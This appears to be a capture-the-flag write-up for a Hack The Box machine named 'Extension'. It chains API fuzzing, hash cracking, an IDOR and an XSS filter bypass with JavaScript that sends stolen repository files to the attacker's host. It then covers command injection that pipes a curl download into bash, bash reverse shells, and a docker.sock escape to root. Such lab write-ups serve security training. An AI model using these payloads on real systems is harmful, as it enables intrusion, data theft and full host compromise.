Extension

As always, start off by running nmap:

nmap -sC -sV -oA nmap/ -T4 10.129.4.9

nmap-initial

Ports 22 and 80 are open, 22 is ssh and 80 for http so focus should be on 80.

snippet-frontpage

At first glance, nothing interesting, the "Get started" button redirects to login-page which does not seem to be vulnerable to any injection attacks. The html source on otherhand is interesting, theres a declared variable Ziggy, which contains information about the endpoints:

{
    "url": "http://10.129.4.9",
    "port": null,
    "defaults": {},
    "routes": {
      "ignition.healthCheck": {
        "uri": "_ignition/health-check",
        "methods": [
          "GET",
          "HEAD"
        ]
      },
      "ignition.executeSolution": {
        "uri": "_ignition/execute-solution",
        "methods": [
          "POST"
        ]
      },
      "ignition.shareReport": {
        "uri": "_ignition/share-report",
        "methods": [
          "POST"
        ]
      },
      "ignition.scripts": {
        "uri": "_ignition/scripts/{script}",
        "methods": [
          "GET",
          "HEAD"
        ]
      },
      "ignition.styles": {
        "uri": "_ignition/styles/{style}",
        "methods": [
          "GET",
          "HEAD"
        ]
      },
      "dashboard": {
        "uri": "dashboard",
        "methods": [
          "GET",
          "HEAD"
        ]
      },
      "users": {
        "uri": "users",
        "methods": [
          "GET",
          "HEAD"
        ]
      },
      "snippets": {
        "uri": "snippets",
        "methods": [
          "GET",
          "HEAD"
        ]
      },
      "snippets.view": {
        "uri": "snippets/{id}",
        "methods": [
          "GET",
          "HEAD"
        ]
      },
      "snippets.update": {
        "uri": "snippets/update/{id}",
        "methods": [
          "GET",
          "HEAD"
        ]
      },
      "api.snippets.update": {
        "uri": "snippets/update/{id}",
        "methods": [
          "POST"
        ]
      },
      "api.snippets.delete": {
        "uri": "snippets/delete/{id}",
        "methods": [
          "DELETE"
        ]
      },
      "snippets.new": {
        "uri": "new",
        "methods": [
          "GET",
          "HEAD"
        ]
      },
      "users.validate": {
        "uri": "management/validate",
        "methods": [
          "POST"
        ]
      },
      "admin.management.dump": {
        "uri": "management/dump",
        "methods": [
          "POST"
        ]
      },
      "register": {
        "uri": "register",
        "methods": [
          "GET",
          "HEAD"
        ]
      },
      "login": {
        "uri": "login",
        "methods": [
          "GET",
          "HEAD"
        ]
      },
      "password.request": {
        "uri": "forgot-password",
        "methods": [
          "GET",
          "HEAD"
        ]
      },
      "password.email": {
        "uri": "forgot-password",
        "methods": [
          "POST"
        ]
      },
      "password.reset": {
        "uri": "reset-password/{token}",
        "methods": [
          "GET",
          "HEAD"
        ]
      },
      "password.update": {
        "uri": "reset-password",
        "methods": [
          "POST"
        ]
      },
      "verification.notice": {
        "uri": "verify-email",
        "methods": [
          "GET",
          "HEAD"
        ]
      },
      "verification.verify": {
        "uri": "verify-email/{id}/{hash}",
        "methods": [
          "GET",
          "HEAD"
        ]
      },
      "verification.send": {
        "uri": "email/verification-notification",
        "methods": [
          "POST"
        ]
      },
      "password.confirm": {
        "uri": "confirm-password",
        "methods": [
          "GET",
          "HEAD"
        ]
      },
      "logout": {
        "uri": "logout",
        "methods": [
          "POST"
        ]
      }
    }
  }

A lot of stuff to enumerate. Probably the most juicy endpoint is management/dump - since the naming suggests that the endpoint dumps something from the app/system. Running GET-request responds 405 METHOD NOT ALLOWED but how about POST?

management-dump-1

Interesting, there's no Authorization errors but instead just message about missing arguments. Time for some good old brute force!

Wfuzz is a good tool for this job. Crafting the payload is a bit tricky since the app seems to be using some kind of tokens to validate user session. Also, we have no idea what the app responds with correct payload so only skip requests that contain text "Missing arguments". A functional payload is:

wfuzz -H "X-Inertia: true" -H "X-Inertia-Version: 207fd484b7c2ceeff7800b8c8a11b3b6" \
-H "X-XSRF-TOKEN: eyJpdiI6Im9nRjF3SmpTOWltYnNRQ1FRWHhIZlE9PSIsInZhbHVlIjoia01tZG94MXVlSzBpbXluOUw4ZGQwRHUzQXhyZ000dWpLQ0xQQ2NZMEdwUWpid3J5VFlGb1lEbDI1TG1sbW9naWdRR1FVcXhMYWl0Y0lwRks4NDhqdzBFZWZZbEhpVDM0UFVPYkl6ZEdEOTA4K3ZhendwbDE1MUNZalovazdHbC8iLCJtYWMiOiIwOGZlODJiYTBmYzQzOWUwZWM1NjE3YWVmMDg5ZGVkOTQ0NGQ0ZjlhNTU0M2FjZDg1MWYxNGM4ZTQzOWY2YzA3IiwidGFnIjoiIn0" \
-b "XSRF-TOKEN=eyJpdiI6Im9nRjF3SmpTOWltYnNRQ1FRWHhIZlE9PSIsInZhbHVlIjoia01tZG94MXVlSzBpbXluOUw4ZGQwRHUzQXhyZ000dWpLQ0xQQ2NZMEdwUWpid3J5VFlGb1lEbDI1TG1sbW9naWdRR1FVcXhMYWl0Y0lwRks4NDhqdzBFZWZZbEhpVDM0UFVPYkl6ZEdEOTA4K3ZhendwbDE1MUNZalovazdHbC8iLCJtYWMiOiIwOGZlODJiYTBmYzQzOWUwZWM1NjE3YWVmMDg5ZGVkOTQ0NGQ0ZjlhNTU0M2FjZDg1MWYxNGM4ZTQzOWY2YzA3IiwidGFnIjoiIn0%3D;snippethtb_session=eyJpdiI6Ik9LdlVlOWNPS1lLaVp1emJiNUI3U3c9PSIsInZhbHVlIjoiUVZuVnJjbVRmRk9yNXFWeUMyRS93TSs1OXVqbWNKV1ZNOU5jM2luR0dvNzN6VVc4M0I2dzlMelQ4WHBGNS90Y2phRExUdXQ4bkp3STdSUDMxOWw0WWpsRzNuSmpMUU5CKzVmZGZRQ25WNi9XMUI2TzJRMWx2ZEN1TXB4NytqOFUiLCJtYWMiOiI0OTNjNjdlNjJmMTQ4NWQ5MzZiNGQ0Y2I0ODlmNjFlY2JiYjNhY2Q4N2EwMjgzMjhhNmVjOWM0NGFiYzM0MjkxIiwidGFnIjoiIn0%3D" \
-w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt \
-d  "{\"_method\": \"post\", \"FUZZ\": \"ASD\" }" \
--hs "Missing arguments" -H "Content-Type: application/json" \
http://snippet.htb/management/dump

Scan reveals that download seems to be the correct key for payload, but value is still wrong.

management-dump-2

Guessing the correct value is not that hard, since usually the most interesting thing about database is users and tablename is usually something like that. After changing the value to users api returns the user-table which is quite large so I will not display it here.

The dump contains password hashes so next step is to try to crack them using hashcat. Extract passwords from list with:

const passwords = users.map((user => user.password))

and save output to a file. After that run hashcat with command:

.\hashcat.exe .\hash.txt .\rockyou.txt -m 1400

Note: as always, I run hashcat on my Windows host-machine since hashcat is MUCH faster with an actual GPU.

Only one password is cracked:

hashcat-results

This password belongs to user juliana@snippet.htb.

After logging in as juliana we get access to the application. Dashboard and Members pages doesn't seem interesting but snippets contains something new.

snippets-initial

One inital thing I noticed is that snippets are queryable with url-parameter, and it is actually possible to see some fields of other's snippets, but the actual content-field is filtered out:

snippets-2

Let's try to interact with the application more by creating our own snippets:

snippets-new

Interesting, there is a public-field which could determinate that snippets are private or viewable by other users. After creating a snippet let's try to edit our snippet but let's capture the request with Burp suite, since there already was an authorization vulnerability let's try that again, instead of editing our just created snippet, let's change the id-parameter to the previously hidden snippet and make it public:

snippet-edit-success

It seems that our request went through. Let's see can we see the content of the snippet

snippet-2-revealed

A new subdomain is revealed to us with a basic auth header. basic auth is essentially username and password of the user seperated by : . This can be reversed by running command:

echo amVhbjpFSG1mYXIxWTdwcEE5TzVUQUlYblluSnBB |base64 -d
jean:EHmfar1Y7ppA9O5TAIXnYnJpA

http://dev.snippet.htb/ has Gitea service running. Basically Gitea is an alternative for Github or GitLab. After logging in as jean there's one repository which contains some kind of extension for Gitea:

gitea-extension-1

Since this is a CTF after all the README heavily suggests that there is someone using this extension which indicates that the next step is related to XSS. Let's analyze the source code:

const list = document.getElementsByClassName("issue list")[0];

const log = console.log

if (!list) {
    log("No gitea page..")
} else {

    const elements = list.querySelectorAll("li");

    elements.forEach((item, index) => {

        const link = item.getElementsByClassName("title")[0]

        const url = link.protocol + "//" + link.hostname + "/api/v1/repos" + link.pathname

        log("Previewing %s", url)

        fetch(url).then(response => response.json())
            .then(data => {
                let issueBody = data.body;

                const limit = 500;
                if (issueBody.length > limit) {
                    issueBody = issueBody.substr(0, limit) + "..."
                }

                issueBody = ": " + issueBody

                issueBody = check(issueBody)

                const desc = item.getElementsByClassName("desc issue-item-bottom-row df ac fw my-1")[0]

                desc.innerHTML += issueBody

            });

    });
}

/**
 * @param str
 * @returns {string|*}
 */
function check(str) {

    // remove tags
    str = str.replace(/<.*?>/, "")

    const filter = [";", "\'", "(", ")", "src", "script", "&", "|", "[", "]"]

    for (const i of filter) {
        if (str.includes(i))
            return ""
    }

    return str

}

The "extension" seems to be checking repositorys issues, doing some checks and then adding them to html.

                 desc.innerHTML += issueBody

Generally speaking, innerHTML is a function that should not be run against user input, since it is vulnerable to XSS. There are some checks but they are bypassable

function check(str) {

    // remove tags
    str = str.replace(/<.*?>/, "")

    const filter = [";", "\'", "(", ")", "src", "script", "&", "|", "[", "]"]

    for (const i of filter) {
        if (str.includes(i))
            return ""
    }

    return str

}

First part seems to be removing tags of the string, but since it doesn't run recursively or search for all matches, this can be bypassed by simply prepending payload with <<> . Blacklist filter can be bypassed many ways, for example "src" does not recognize srC and srC is also valid HTML. Parenthesis are also not an issue since on JavaScript you can call functions using backticks instead of parenthesis. One possible payload for bypassing this is:

 <<><img srC="http://10.10.14.64:8000/asd" onerror=jQuery.getScript`http://10.10.14.64:8000/dummy.js` />

Basically, this tag tries to load an image on a path that does not exist and after that it executes the onerror-handler. Gitea has jQuery by default which makes retreiving custom script from external source a little easier. On this case, error handler loads script called dummy.js. Before going further setup a web-server with following command:

python3 -m http.server

and create file called dummy.js Next, use the earlier payload to create issue on extension-repository and wait (approx. 1 minute) until "another user" comes to check your issue and trigger

Note: There will be three parts: 1) To enumerate repoistories 2) To enumerate repository contents 3) To retrieve repo files

on this and I will not display contents of each result. Each part works on same princible: It sends the whole body-content of the web-page of the user via url params on base64-encoded format.

First part of the dummy.js will be:

async function part1() {
    const req = await fetch("http://dev.snippet.htb/explore/repos")
    const data = await req.text()
    const based = btoa(unescape(encodeURIComponent(data)))
    fetch("http://10.10.14.64:8000/?body="+based)
}

part1()

This reveals that the user has another repository called /charlie/backups/

On next part update dummy.js content to:

async function part2() {
  const req = await fetch("http://dev.snippet.htb/charlie/backups/")
  const data = await req.text()
  const based = btoa(unescape(encodeURIComponent(data)))
  fetch("http://10.10.14.64:8000/?body="+based)
}

part2()

This reveals files of the repository. The repo has only one file called backup.tar.gz. Next and last step is to retrieve it, update dummy.js content to:

  function blobToBase64(blob) {
    return new Promise((resolve, _) => {
      const reader = new FileReader();
      reader.onloadend = () => resolve(reader.result);
      reader.readAsDataURL(blob);
    });
  }

async function part3() {
    const req = await fetch("http://dev.snippet.htb/charlie/backups/raw/branch/master/backup.tar.gz")
    const data = await req.blob()
    const based = await blobToBase64(data)
   // const based = btoa(unescape(encodeURIComponent(data)))
    fetch("http://10.10.14.64:8000/?body="+based)
}

part3() 

After receiving and extracting the backup archive it's time to check what it includes. It seems to be a backup of the charlie-users home folder, which also contains ssh keys! With these keys we have access to the machine:

ssh -i id_rsa charlie@snippet.htb

There seems to be another user on the machine called jeans. Also, we have access to jean´s home-folder and user.txt also resides there, but we can´t read it. Interestingly, there´s also a file called .git-credentials which contains the password for jean.

charlie-to-jean-gg

On jean's home folder, there's also a projects-folder which contains source code for previously seen snippets-application. The application is built on Laravel which is a php framework. After enumerating the source code there seems to be an attack vector on AdminController´s validateEmail-function:

class AdminController extends Controller
{

    /**
     * @throws ValidationException
     */
    public function validateEmail(Request $request)
    {
        $sec = env('APP_SECRET');

        $email = urldecode($request->post('email'));
        $given = $request->post('cs');
        $actual = hash("sha256", $sec . $email);

        $array = explode("@", $email);
        $domain = end($array);

        error_log("email:" . $email);
        error_log("emailtrim:" . str_replace("\0", "", $email));
        error_log("domain:" . $domain);
        error_log("sec:" . $sec);
        error_log("given:" . $given);
        error_log("actual:" . $actual);

        if ($given !== $actual) {
            throw ValidationException::withMessages([
                'email' => "Invalid signature!",
            ]);
        } else {
            $res = shell_exec("ping -c1 -W1 $domain > /dev/null && echo 'Mail is valid!' || echo 'Mail is not valid!'");
            return Redirect::back()->with('message', trim($res));
        }

    }
}

Basically, the email is split by @ sign and the last part is used as an address to ping. We could execute code by injecting bash code instead of real domain on the field. There's also a checksum check which includes APP_SECRET env-variable on what we have no access to, but luckily cs-field is autogenerated after fetching data from database. This can be seen on User model on app/Models/User.php:

 public function getCsAttribute()
    {
        $sec = env('APP_SECRET');

        return hash('sha256', $sec . $this->attributes['email']);
    }

But none of this helpful yet since to exploit this we need to have admin access to the app. Also, the environment-variables are not exposed on source code which could be useful to access database for example. Time to enumerate some more.

Let's run pspy on machine to see what's going on the machine.

pspy-mysql-pw

After runnning pspy for a while, there is a command that exposes MySQL - credentials. The MySQL seems to be running on a separate docker container and the machine doesn't have mysql installed so we need to create a tunnel and access mysql from local machine. Create tunnel with:

ssh -i id_rsa charlie@snippet.htb -L 33006:127.0.0.1:3306

Now, we can access MySQL through localhost:33006.

There sems to be only one database: webapp

MySQL [(none)]> show databases;

+--------------------+

| Database           |

+--------------------+

| information_schema |

| mysql              |

| performance_schema |

| webapp             |

+--------------------+

To find admin-users execute following query:

select * from users where user_type != "Member"; 

This reveals only one admin user: charlie with user id 1. Let's change charlies password to password123:

update users set password = "ef92b778bafe771e89245b89ecbc08a44a4e166c06659911881f383d4473e94f" where id = 1;

After logging in as Charlie theres a validate-button on members view:

charlie-validate

Before executing validate, let's modify Kaleigh Lenner's email address to inject code. Reason for Kaleigh is just that it's first on the list.

update users set email = "test@10.10.14.64;curl${IFS}10.10.14.64:8000/shell.sh${IFS}|bash" where name = "Kaleigh Lehner";

This code basically curls shell.sh file from web and executes it right after. I'm using ${IFS} instead of spaces since I had issues with spaces. Add a file shell.sh to the same folder where your local python-webserver is running (from xss step) with a reverse shell, an example code:

bash -i >& /dev/tcp/10.10.14.64/9001 0>&1

Next, setup nc listener on port 9001:

nc -lnvp 9001

Now, execute validate-command on Kaleigh and we have a shell! Note, that we are now inside a docker container. After a quick enumeration there's a docker.sock file on /app folder. Quick googling about that file revealed that it's used to manage containers and it can be exploited to mount on root-filesystem! Basically, we create a new docker container and attach is with a startup-command which gives us a reverse shell, steps are: 1) Query available docker images 2) Set our cmd to execute 3) Create container with available image and cmd we just set 4) Start the container we just created The commands are copied from: https://gist.github.com/PwnPeter/3f0a678bf44902eae07486c9cc589c25 and modified slightly to match machines paths and containers.

To check available images, let's run

 curl -s --unix-socket /app/docker.sock http://localhost/images/json

 [
    {
      "Containers": -1,
      "Created": 1656086146,
      "Id": "sha256:b97d15b16a2172a201a80266877a65a44b0d7fa31c29531c20cdcc8e98c2d227",
      "Labels": {
        "io.webdevops.layout": "8",
        "io.webdevops.version": "1.5.0",
        "maintainer": "info@webdevops.io",
        "vendor": "WebDevOps.io"
      },
      "ParentId": "sha256:762bfd88e0120a1018e9a4ccbe56d654c27418c7183ff4a817346fd2ac8b69af",
      "RepoDigests": null,
      "RepoTags": [
        "laravel-app_main:latest"
      ],
      "SharedSize": -1,
      "Size": 1975239137,
      "VirtualSize": 1975239137
    },
    {
      "Containers": -1,
      "Created": 1655515586,
      "Id": "sha256:ca37554c31eb2513cf4b1295d854589124f8740368842be843d2b4324edd4b8e",
      "Labels": {
        "io.webdevops.layout": "8",
        "io.webdevops.version": "1.5.0",
        "maintainer": "info@webdevops.io",
        "vendor": "WebDevOps.io"
      },
      "ParentId": "",
      "RepoDigests": null,
      "RepoTags": [
        "webdevops/php-apache:7.4"
      ],
      "SharedSize": -1,
      "Size": 1028279761,
      "VirtualSize": 1028279761
    },
    {
      "Containers": -1,
      "Created": 1640902141,
      "Id": "sha256:6af04a6ff8d579dc4fc49c3f3afcaef2b9f879a50d8b8a996db2ebe88b3983ce",
      "Labels": {
        "maintainer": "Thomas Bruederli <thomas@roundcube.net>"
      },
      "ParentId": "",
      "RepoDigests": [
        "roundcube/roundcubemail@sha256:f5b054716e2fdf06f4c5dbee70bc6e056b831ca94508ba0fc1fcedc8c00c5194"
      ],
      "RepoTags": [
        "roundcube/roundcubemail:latest"
      ],
      "SharedSize": -1,
      "Size": 612284073,
      "VirtualSize": 612284073
    },
    {
      "Containers": -1,
      "Created": 1640805761,
      "Id": "sha256:c99e357e6daee694f9f431fcc905b130f7a246d8c172841820042983ff8df705",
      "Labels": null,
      "ParentId": "",
      "RepoDigests": [
        "composer@sha256:5e0407cda029cea056de126ea1199f351489e5835ea092cf2edd1d23ca183656"
      ],
      "RepoTags": [
        "composer:latest"
      ],
      "SharedSize": -1,
      "Size": 193476514,
      "VirtualSize": 193476514
    },
    {
      "Containers": -1,
      "Created": 1640297121,
      "Id": "sha256:cec4e9432becb39dfc2b911686d8d673b8255fdee4a501fbc1bda87473fb479d",
      "Labels": {
        "org.opencontainers.image.authors": "The Docker Mailserver Organization on GitHub",
        "org.opencontainers.image.description": "A fullstack but simple mail server (SMTP, IMAP, LDAP, Antispam, Antivirus, etc.). Only configuration files, no SQL database.",
        "org.opencontainers.image.documentation": "https://github.com/docker-mailserver/docker-mailserver/blob/master/README.md",
        "org.opencontainers.image.licenses": "MIT",
        "org.opencontainers.image.revision": "061bae6cbfb21c91e4d2c4638d5900ec6bee2802",
        "org.opencontainers.image.source": "https://github.com/docker-mailserver/docker-mailserver",
        "org.opencontainers.image.title": "docker-mailserver",
        "org.opencontainers.image.url": "https://github.com/docker-mailserver",
        "org.opencontainers.image.vendor": "The Docker Mailserver Organization",
        "org.opencontainers.image.version": "refs/tags/v10.4.0"
      },
      "ParentId": "",
      "RepoDigests": [
        "mailserver/docker-mailserver@sha256:80d4cff01d4109428c06b33ae8c8af89ebebc689f1fe8c5ed4987b803ee6fa35"
      ],
      "RepoTags": [
        "mailserver/docker-mailserver:latest"
      ],
      "SharedSize": -1,
      "Size": 560264926,
      "VirtualSize": 560264926
    },
    {
      "Containers": -1,
      "Created": 1640059378,
      "Id": "sha256:badd93b4fdf82c3fc9f2c6bc12c15da84b7635dc14543be0c1e79f98410f4060",
      "Labels": {
        "maintainer": "maintainers@gitea.io",
        "org.opencontainers.image.created": "2021-12-21T03:59:32Z",
        "org.opencontainers.image.revision": "877040e6521e48c363cfe461746235dce4ab822b",
        "org.opencontainers.image.source": "https://github.com/go-gitea/gitea.git",
        "org.opencontainers.image.url": "https://github.com/go-gitea/gitea"
      },
      "ParentId": "",
      "RepoDigests": [
        "gitea/gitea@sha256:eafb7459a4a86a0b7da7bfde9ef0726fa0fb64657db3ba2ac590fec0eb4cdd0c"
      ],
      "RepoTags": [
        "gitea/gitea:1.15.8"
      ],
      "SharedSize": -1,
      "Size": 148275092,
      "VirtualSize": 148275092
    },
    {
      "Containers": -1,
      "Created": 1640055479,
      "Id": "sha256:dd3b2a5dcb48ff61113592ed5ddd762581be4387c7bc552375a2159422aa6bf5",
      "Labels": null,
      "ParentId": "",
      "RepoDigests": [
        "mysql@sha256:20575ecebe6216036d25dab5903808211f1e9ba63dc7825ac20cb975e34cfcae"
      ],
      "RepoTags": [
        "mysql:5.6"
      ],
      "SharedSize": -1,
      "Size": 302527523,
      "VirtualSize": 302527523
    },
    {
      "Containers": -1,
      "Created": 1639694686,
      "Id": "sha256:0f7cb85ed8af5c33c1ca00367e4b1e4bfae6ec424f52bb04850af73fb19831d7",
      "Labels": null,
      "ParentId": "",
      "RepoDigests": [
        "php@sha256:6eb4c063a055e144f4de1426b82526f60d393823cb017add32fb85d79f25b62b"
      ],
      "RepoTags": [
        "php:7.4-fpm-alpine"
      ],
      "SharedSize": -1,
      "Size": 82510913,
      "VirtualSize": 82510913
    }
  ]

There's many options to use, let's use use composer on our case. Before that, let's declare our command to run when container starts:

 cmd="[\"/bin/sh\",\"-c\",\"chroot /tmp sh -c \\\"bash -c 'bash -i &>/dev/tcp/10.10.14.64/9002 0<&1'\\\"\"]"

Next, let's create our container:

 curl -s -X POST --unix-socket /app/docker.sock -d "{\"Image\":\"composer\",\"cmd\":$cmd,\"Binds\":[\"/:/tmp:rw\"]}" -H 'Content-Type: application/json' http://localhost/containers/create?name=peterpwn_root 

Before last step, setup another netcat listener on local machine, this time on port 9002

 nc -lnvp 9002

Finally, start the container we just created:

 curl -s -X POST --unix-socket /app/docker.sock "http://localhost/containers/peterpwn_root/start"

After that, a root shell spawns and the machine is COMPLETED!

To be continued